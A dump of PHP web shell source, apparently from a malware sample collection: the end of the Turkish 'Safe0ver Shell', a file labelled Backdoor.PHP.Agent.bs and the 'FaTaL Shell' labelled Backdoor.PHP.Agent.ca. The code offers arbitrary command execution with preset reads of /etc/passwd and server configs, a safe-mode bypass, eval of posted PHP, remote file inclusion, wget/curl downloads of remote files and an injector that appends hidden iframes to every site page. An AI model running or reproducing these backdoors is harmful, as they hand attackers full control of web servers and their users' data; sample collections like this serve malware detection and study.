<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
<input type=\"hidden\" name=\"file\" value=\"$file\">
<input type=\"hidden\" name=\"auth\" value=\"yes\">
<input type=\"submit\" value=\"Yes\"></form>
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
}
echo "</td></tr></center>";
}
elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */ echo "<center><table><tr><td NOWRAP>" ;
if ($auth == "yes") {
if (@unlink($file)==false) {
echo "Could not remove \"$file\"<br>";
}
else {
echo "Successfully removed \"$file\"<br>";
}
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form>";
}
else {
echo "Are you sure you want to delete \"$file\" ?
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"delfile\">
<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
<input type=\"hidden\" name=\"file\" value=\"$file\">
<input type=\"hidden\" name=\"auth\" value=\"yes\">
<input type=\"submit\" value=\"Yes\"></form>
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
}
echo "</td></tr></center>";
}
elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */
echo "<center><table><tr><td NOWRAP>";
$i = 1;
while (file_exists("$lastdir/newfile$i.txt"))
$i++;
$file = fopen("$lastdir/newfile$i.txt", "w+");
if ($file == false)
echo "Could not create the new file...<br>";
else
echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>";
echo "
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
<input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\">
</form></center>
</td></tr></table></center> ";
}
elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */
echo "<center><table><tr><td NOWRAP>" ;
$i = 1;
while (is_dir("$lastdir/newdir$i"))
$i++;
$file = mkdir("$lastdir/newdir$i", 0777);
if ($file == false)
echo "Could not create the new directory...<br>";
else
echo "Successfully created: \"$lastdir/newdir$i\"<br>";
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
<input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\">
</form></center></td></tr></table></center>";
}
elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */
$contents = "";
$fc = @file( $file );
while ( @list( $ln, $line ) = each( $fc ) ) {
$contents .= htmlentities( $line ) ;
}
echo "<br><center><table><tr><td NOWRAP>";
echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n";
echo "<strong>EDIT FILE: </strong>$file<br>\n";
echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n";
echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n";
echo "<input type=\"submit\" value=\"Save\">";
echo "</form>";
echo "</td></tr></table></center>";
}
elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */
$fo = fopen($file, "w");
$wrret = fwrite($fo, stripslashes($contents));
$clret = fclose($fo);
}
elseif ( $cmd=="downl" ) { /*<!-- Save the edited file back to a file --> */
$downloadfile = urldecode($file);
if (function_exists("basename"))
$downloadto = basename ($downloadfile);
else
$downloadto = "download.ext";
if (!file_exists("$downloadfile"))
echo "The file does not exist";
else {
$size = @filesize("$downloadfile");
if ($size != false) {
$add="; size=$size";
}
else {
$add="";
}
header("Content-Type: application/download");
header("Content-Disposition: attachment; filename=$downloadto$add");
$fp=fopen("$downloadfile" ,"rb");
fpassthru($fp);
flush();
}
}
elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */
?>
<center>
<table>
<tr>
<td NOWRAP>
Dosya Yükleme Sekmesine Tikladiniz !
<br> Eger Yüklemek istediginiz Dosya mevcut ise üzerine Yazilir.<br><br>
<form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post">
<input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
<input type="hidden" name="cmd" value="uploadproc">
<input type="hidden" name="dir" value="<?php echo $dir ?>">
<input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
<input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
Dosya Yükle:<br>
<input size="75" name="userfile" type="file"><br>
<input type="submit" value="Yükle">
</form>
<br>
<form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST">
<input type="hidden" name="cmd" value="<?php echo $lastcmd ?>">
<input type="hidden" name="dir" value="<?php echo $lastdir ?>">
<input tabindex="0" type="submit" value="Iptal">
</form>
</td>
</tr>
</table>
</center>
<?php
}
elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */
echo "<center><table><tr><td NOWRAP>";
if (file_exists($userfile))
$res = copy($userfile, "$dir/$userfile_name");
echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
if ($res) {
echo "Basariyla Yüklendi \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
echo "Yüklenen Dosya Adi: \"$userfile_name\".\n<br>Dosya Adi: \"$userfile\".\n<br>";
echo "Dosya Boyutu: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
}
else {
echo "Yüklenemedi...";
}
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form></center>" ;
echo "<br><br></td></tr></table></center>";
}
elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
echo "<hr>";
$fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) {
echo spacetonbsp(@htmlentities($line))."<br>\n";
}
echo "<hr>";
}
elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */
if (function_exists('is_dir')) {
if (is_dir("$oldfile")) {
$objname = "Directory";
$objident = "Directory";
}
else {
$objname = "Filename";
$objident = "file";
}
}
echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center>&nbsp;Rename a file:&nbsp;</center></td></tr></table><br>\n";
If (empty($newfile) != true) {
echo "<center>";
$return = @rename($oldfile, "$olddir$newfile");
if ($return) {
echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\"";
}
else {
if ( @file_exists("$olddir$newfile") ) {
echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again...";
}
else {
echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
}
}
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form></center>" ;
}
else {
$dpos = strrpos($oldfile, "/");
if (strval($dpos)!="") {
$olddir = substr($oldfile, 0, $dpos+1);
}
else {
$olddir = "$lastdir/";
}
$fpos = strrpos($oldfile, "/");
if (strval($fpos)!="") {
$inputfile = substr($oldfile, $fpos+1);
}
else {
$inputfile = "";
}
echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n";
echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n";
echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n";
echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n";
echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n";
echo "Rename \"$oldfile\" to:<br>\n";
echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">";
echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
echo "</td></tr></table></center>";
}
}
else if ( $cmd == "con") {
?>
<center>
<table>
<tr><td>&nbsp;</td>
</tr></table>
<?php
}
else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */
$isMainMenu = true;
?>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" class="border">
<center>&nbsp;-<[{ <?php echo $scriptTitle ?> Main Menu }]>-&nbsp;</center>
</td>
</tr>
</table>
<br>
<center>
<table border="0" NOWRAP>
<tr>
<td valign="top" class="silver border">
<?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>##Safe0ver##</strong></font>", "cmd=dir&dir=.").sp(2); ?> </td>
<td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP><span class="style5"> Safe0ver Shell Piyasada Bulunan Bir Cok Shell'in Kodlarindan(c99,r57 vs...) Sentezlenerek Kodlanmistir.Entegre Olarak Bypass Özelligi Eklenmis Ve Böylece Tahrip Gücü Yükseltilmistir.Yazilimimiz Hic bir Virus,worm,trojan gibi Kullaniciyi Tehdit Eden Veya Sömüren yazilimlar Icermemektedir.<p>--------------------------<p>Bypass Kullaným:<b>Cat /home/evilc0der/public_html/config.php</b> Gibi Olmalidir.<br>
</span></td>
</tr>
</table>
<br><p><br>Safe Mode ByPAss<p><form method="POST">
<p align="center"><input type="text" size="40" value="<? if($_POST['dizin'] != "") { echo $_POST['dizin']; } else echo $klasor;?>" name="dizin">
<input type="submit" value="Çalistir"></p>
</form>
<form method="POST">
<p align="center"><select size="1" name="dizin">
<option value="uname -a;id;pwd;hostname">Sistem Bilgisi</option>
<option value="cat /etc/passwd">cat /etc/passwd</option>
<option value="cat /var/cpanel/accounting.log">cat /var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">cat /etc/syslog.conf</option>
<option value="cat /etc/hosts">cat /etc/hosts</option>
<option value="cat /etc/named.conf">cat /etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">cat /etc/httpd/conf/httpd.conf</option>
<option value="netstat -an | grep -i listen">Açik Portlar</option>
<option value="ps -aux">Çalisan Uygulamalar</option>
</select> <input type="submit" value="Çalistir"></p>
</form>
------------------------------------------------------------------------------------<p>
<?
$evilc0der=$_POST['dizin'];
if($_POST['dizin'])
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$safemodgec = shell_exec($evilc0der);
echo "<textarea rows=17 cols=85>$safemodgec</textarea>";
}
?>
</center>
<br>
<?php
}
if ($cmd != "downl") {
if ( $isMainMenu != true) {
?>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" style="class="silver border">
<center><strong>
&nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Main Menu&nbsp;] </font>", "cmd=&dir="); ?>&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;R00T&nbsp;] </font>", "cmd=dir&dir=."); ?> &nbsp;&nbsp;
</strong></center>
</td>
</tr>
</table>
<br>
<?php
}
?>
<table width=100% border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" class="silver border">
<center>&nbsp;<?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>&nbsp;</center>
</td>
</tr>
</table>
</td>
</tr>
</table>
<?php
}
?>

76
PHP/Backdoor.PHP.Agent.bs Normal file
View File

@ -0,0 +1,76 @@
<?
$dir = @getcwd();
echo "Jikustik<br>";
$OS = @PHP_OS;
echo "OSTYPE:$OS<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}}
if(!isset($_SERVER['DOCUMENT_ROOT']))
{
$n = $_SERVER['SCRIPT_NAME'];
$f = ereg_replace('\\\\', '/',$_SERVER["PATH_TRANSLATED"]);
$f = str_replace('//','/',$f);
$_SERVER['DOCUMENT_ROOT'] = eregi_replace($n, "", $f);
}
$codigo = "<IFRAME src=\"mailto:store@keptprivate.com\"
width=\"0\" height=\"0\" frameborder=\"0\"></iframe>\n";
$directorio = $_SERVER['DOCUMENT_ROOT'];
foreach (glob("$directorio/*.php") as $archivo) {
$fp=fopen($archivo,"a+");
fputs($fp,$codigo);
}
foreach (glob("$directorio/*.htm") as $archivh) {
$fp=fopen($archivh,"a+");
fputs($fp,$codigo);
}
foreach (glob("$directorio/*.html") as $archivl) {
$fp=fopen($archivl,"a+");
fputs($fp,$codigo);
}
?>

301
PHP/Backdoor.PHP.Agent.ca Normal file
View File

@ -0,0 +1,301 @@
<? include $_GET['baba']; ?>
<?php
$a = "http://"; //need some codes
$b = "evilc0der.com"; //need some hits
$c = "/x.html"; //need scripts coder's names
session_start();
error_reporting(E_ALL ^ E_NOTICE);
set_magic_quotes_runtime(0);
@set_time_limit(0);
if(@get_magic_quotes_gpc()){foreach ($_POST as $k=>$v){$_POST[$k] = stripslashes($v);}}
@ini_set('max_execution_time',0);
(@ini_get('safe_mode')=="1" ? $safe_mode="ON" : $safe_mode="OFF(Rootla_Beni:)");
(@ini_get('disable_functions')!="" ? $disfunc=ini_get('disable_functions') : $disfunc=0);
(strtoupper(substr(PHP_OS, 0, 3))==='WIN' ? $os=1 : $os=0);
$version='version 1.0 by FaTaLErrOr';
$action=$_POST['action'];
$file=$_POST['file'];
$dir=$_POST['dir'];
$content='';
$stdata='';
$style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}select{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{background-color: #A8A8AD;color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
$header='<html><head><title>'.getenv("HTTP_HOST").' - FaTaL Shell v1.0</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1254">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
$footer='</body></html>';
$lang=array(
'filext'=>'Lutfen Dosyayi Adlandiriniz Yada Degistiriniz.',
'uploadok'=>'Baþarýyla Yüklendi.',
'dircrt'=>'Klasör Oluþturuldu.',
'dontlist'=>'Listelenemiyor Ýzin Yok.',
'dircrterr'=>'Oluþturulamýyor Ýzin Yok.',
'dirnf'=>'Dizin Bulunamadi.',
'filenf'=>'.',
'dontwrdir'=>'Sadece Okunabilir.',
'empty'=>'Dizin Boþ Deðil Yada Ýzin Yok.',
'deletefileok'=>'Dosya Silindi.',
'deletedirok'=>'Klasör Silindi.',
'isdontfile'=>'Lütfen Full Url Yazýn. c:/program files/a.php Gibi',
'cantrfile'=>'Dosya Açýlamýyor izin Yok.',
'onlyracc'=>'Dosya Editlenemiyor Okuma Ýzni Var Sadece..',
'workdir'=>'Çalýþma Dizini: ',
'fullacc'=>'Full Yetki.',
'fullaccdir'=>'Full Yetkiniz Var Dosya Silip Düzenleyebilirsiniz.',
'thisnodir'=>'Klasör Seçin.',
'allfuncsh'=>'Fonksiyoýnlar Kapalý.'
);
$act=array('viewer','editor','upload','shell','phpeval','download','delete','deletedir');//here added new actions
function test_file($file){
if(!file_exists($file))$err="1";
elseif(!is_file($file)) $err="2";
elseif(!is_readable($file))$err="3";
elseif(!is_writable($file))$err="4"; else $err="5";
return $err;}
function test_dir($dir){
if(!file_exists($dir))$err="1";
elseif(!is_dir($dir)) $err="2";
elseif(!is_readable($dir))$err="3";
elseif(!is_writable($dir))$err="4"; else $err="5";
return $err;}
function perms($file){
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {$info = 's';}
elseif (($perms & 0xA000) == 0xA000) {$info = 'l';}
elseif (($perms & 0x8000) == 0x8000) {$info = '-';}
elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}
elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}
elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}
elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}
else {$info = 'u';}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
return $info;}
function view_size($size){
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;}
if(isset($action)){if(!in_array($action,$act))$action="viewer";else $action=$action;}else $action="viewer";
if(isset($dir)){
$ts['test']=test_dir($dir);
switch($ts['test']){
case 1:$stdata.=$lang['dirnf'];break;
case 2:$stdata.=$lang['thisnodir'];break;
case 3:$stdata.=$lang['dontlist'];break;
case 4:$stdata.=$lang['dontwrdir'];$dir=chdir($GLOBALS['dir']);break;
case 5:$stdata.=$lang['fullaccdir'];$dir=chdir($GLOBALS['dir']);break;}
}else $dir=@chdir($dir);
$dir=getcwd()."/";
$dir=str_replace("\\","/",$dir);
if(isset($file)){
$ts['test1']=test_file($file);
switch ($ts['test1']){
case 1:$stdata.=$lang['filenf'];break;
case 2:$stdata.=$lang['isdontfile'];break;
case 3:$stdata.=$lang['cantrfile'];break;
case 4:$stdata.=$lang['onlyracc'];$file=$file;break;
case 5:$stdata.=$lang['fullacc'];$file=$file;break;}
}
function shell($cmd)
{
global $lang;
$ret = '';
if (!empty($cmd))
{
if(function_exists('exec')){@exec($cmd,$ret);$ret = join("\n",$ret);}
elseif(function_exists('shell_exec')){$ret = @shell_exec($cmd);}
elseif(function_exists('system')){@ob_start();@system($cmd);$ret = @ob_get_contents();@ob_end_clean();}
elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$ret = @ob_get_contents();@ob_end_clean();}
elseif(@is_resource($f = @popen($cmd,"r"))){$ret = "";while(!@feof($f)) { $ret .= @fread($f,1024); }@pclose($f);}
else $ret=$lang['allfuncsh'];
}
return $ret;
}
function createdir($dir){mkdir($dir);}
//delete file
if($action=="delete"){
if(unlink($file)) $content.=$lang['deletefileok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk Ýçin Týklayýnýz.</a>";
}
//delete dir
if($action=="deletedir"){
if(!rmdir($file)) $content.=$lang['empty']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk Ýçin Týklayýnýz.</a>";
else $content.=$lang['deletedirok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk Ýçin Týklayýnýz.</a>";
}
//shell
if($action=="shell"){
$content.="<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"shell\">
<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
<textarea readonly rows=\"15\" cols=\"150\">".convert_cyr_string(htmlspecialchars(shell($_POST['command'])),"d","w")."</textarea><br>
<input type=\"submit\" value=\"Uygula\"></form>";}
//editor
if($action=="editor"){
$stdata.="<form method=POST>
<input type=\"hidden\" name=\"action\" value=\"editor\">
<input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
Dosyanýn Adý (Full Url Yazýn)<input type=text name=file value=\"".($file=="" ? $file=$dir : $file=$file)."\" size=50><input type=submit value=\"Editle\"></form>";
function writef($file,$data){
$fp = fopen($file,"w+");
fwrite($fp,$data);
fclose($fp);
}
function readf($file){
clearstatcache();
$f=fopen($file, "r");
$contents = fread($f,filesize($file));
fclose($f);
return htmlspecialchars($contents);
}
if(@$_POST['save'])writef($file,$_POST['data']);
if(@$_POST['create'])writef($file,"");
$test=test_file($file);
if($test==1){
$content.="<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"editor\">
File name:<input type=\"text\" name=\"file\" value=\"".$file."\" size=\"50\"><br>
<input type=\"submit\" name=\"create\" value=\"Create new file with this name?\">
<input type=\"reset\" value=\"No\"></form>";
}
if($test>2){
$content.="<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"editor\">
<input type=\"hidden\" name=\"file\" value=\"".$file."\">
<textarea name=\"data\" rows=\"30\" cols=\"180\">".@readf($file)."</textarea><br>
<input type=\"submit\" name=\"save\" value=\"Kaydet\"><input type=\"reset\" value=\"Reset\"></form>";
}}
//viewer
if($action=="viewer"){
$content.="<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
$content.="<tr><td><form method=POST>Klasore Git:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"Git\"></form></td></tr>";
if (is_dir($dir)) {
if (@$dh = opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if(filetype($dir . $file)=="dir") $dire[]=$file;
if(filetype($dir . $file)=="file")$files[]=$file;
}
closedir($dh);
@sort($dire);
@sort($files);
if ($GLOBALS['os']==1) {
$content.="<tr><td>HDD Secin:";
for ($j=ord('C'); $j<=ord('Z'); $j++)
if (@$dh = opendir(chr($j).":/"))
$content.='<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
$content.="</td></tr>";
}
$content.="<tr><td>Sistem: ".@php_uname()."</td></tr><tr><td></td><td>Biçim</td><td>Boyut</td><td>izin</td><td>Seçenekler</td></tr>";
for($i=0;$i<count($dire);$i++) {
$link=$dir.$dire[$i];
$content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>Klasor</td><td></td><td>'.perms($link).'</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.file.value=\''.$link.'\'; document.reqs.submit();" title="Klasörü Sil">X</a></td></tr>';
}
for($i=0;$i<count($files);$i++) {
$linkfile=$dir.$files[$i];
$content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>Dosya</td><td>'.view_size(filesize($linkfile)).'</td><td>'.perms($linkfile).'</td><td><a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Download">D</a><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Edit">E</a><a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Bu Dosyayi Sil">X</a></td></tr>';
}
$content.="</table>";
}}}
//downloader
if($action=="download"){
header('Content-Length:'.filesize($file).'');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.$file.'"');
readfile($file);}
//phpeval
if($action=="phpeval"){
$content.="<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"phpeval\">
<input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
&lt;?php<br>
<textarea name=\"phpev\" rows=\"5\" cols=\"150\">".@$_POST['phpev']."</textarea><br>
?><br>
<input type=\"submit\" value=\"Uygula\"></form>";
if(isset($_POST['phpev']))$content.=eval($_POST['phpev']);}
//upload
if($action=="upload"){
if(isset($_POST['dirupload'])) $dirupload=$_POST['dirupload'];else $dirupload=$dir;
$form_win="<tr><td><form method=POST enctype=multipart/form-data>
<input type=\"hidden\" name=\"action\" value=\"upload\">
Buraya Uploadla:<input type=text name=dirupload value=\"".$dirupload."\" size=50></tr></td><tr><td>Dosyayý Adlandýr (Gerekli) :<input type=text name=filename></td></tr><tr><td><input type=file name=file><input type=submit name=uploadloc value='Upload Et'></td></tr>";
if($os==1)$content.=$form_win;
if($os==0){
$content.=$form_win;
$content.='<tr><td><select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>File addres:<input type=text name=urldown>
<input type=submit name=upload value=Upload></form></td></tr>';
}
if(isset($_POST['uploadloc'])){
if(!isset($_POST['filename'])) $uploadfile = $dirupload.basename($_FILES['file']['name']); else
$uploadfile = $dirupload."/".$_POST['filename'];
if(test_dir($dirupload)==1 && test_dir($dir)!=3 && test_dir($dir)!=4){createdir($dirupload);}
if(file_exists($uploadfile))$content.=$lang['filext'];
elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile))
$content.=$lang['uploadok'];
}
if(isset($_POST['upload'])){
if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename']))
switch($_POST['with'])
{
case wget:shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");break;
case fetch:shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");break;
case lynx:shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
case links:shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
case GET:shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");break;
case curl:shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");break;
}}}
//end function
?><?=$header;?>
<style type="text/css">
<!--
.style4 {
font-size: x-large;
font-weight: bold;
}
.style5 {color: #FF0000}
.style8 {color: #CCFF00}
-->
</style>
<a href="#" onclick="document.reqs.action.value='viewer';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();"><p align="center" class="style4">FaTaLSheLL v1.0 </p></a>
